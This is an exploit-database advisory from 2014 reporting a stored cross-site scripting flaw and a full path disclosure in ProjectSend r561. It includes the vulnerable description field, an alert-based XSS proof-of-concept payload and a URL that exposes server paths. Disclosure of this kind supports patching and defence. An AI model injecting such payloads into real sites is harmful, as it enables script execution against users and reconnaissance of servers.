Lucene search

K
zdtTaurus Omar1337DAY-ID-23021
HistoryDec 20, 2014 - 12:00 a.m.

ProjectSend - Cross Site Scripting Vulnerability

2014-12-2000:00:00
Taurus Omar
0day.today
13

EPSS

0.002

Percentile

58.7%

ProjectSend version r561 Ultimate suffers from cross site scripting and path disclosure vulnerabilities.

# Exploit Title: ProjectSend - Cross Site Scripting & Full Path Disclosure Vulnerability's 
# Date: 19/12/2014
# Url Vendor: http://www.projectsend.org/
# Vendor Name: ProjectSend 
# Version: r561 Ultimate Version
# CVE:  CVE-2014-1155
# Author: TaurusOmar	
# Tiwtte: @TaurusOmar_
# Email:  [emailΒ protected]
# Home:  overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: Medium

Description
ProjectSend is a client-oriented file uploading utility. Clients are created and assigned a username and a password. Files can then be uploaded under each account with the ability to add a title and description to each.When a client logs in from any browser anywhere, the client will see a page that contains your company logo, and a sortable list of every file uploaded under the client's name, with description, time, date, etc.. It also works as a history of "sent" files, provides a differences between revisions, the time that it took between each revision, and so on.

------------------------
+ CROSS SITE SCRIPTING + 
------------------------
# Exploiting Description - Get into code xss in the box of image description. 
<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">DESCRIPTION</textarea>

#P0c
"><img src=x onerror=;;alert('XSS') />

<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">CODE XSS</textarea>

#Proof Concept
http://i.imgur.com/FOPIvd4.jpg


------------------------
+ FULL PATH DISCLOSURE +
------------------------
# Exploiting Description - The url disclosure directory of platform. 

#P0c
http://site.com/projectsend/templates/pinboxes/template.php

#Proof Concept
http://i.imgur.com/xfN4kDV.jpg

#  0day.today [2018-02-18]  #

EPSS

0.002

Percentile

58.7%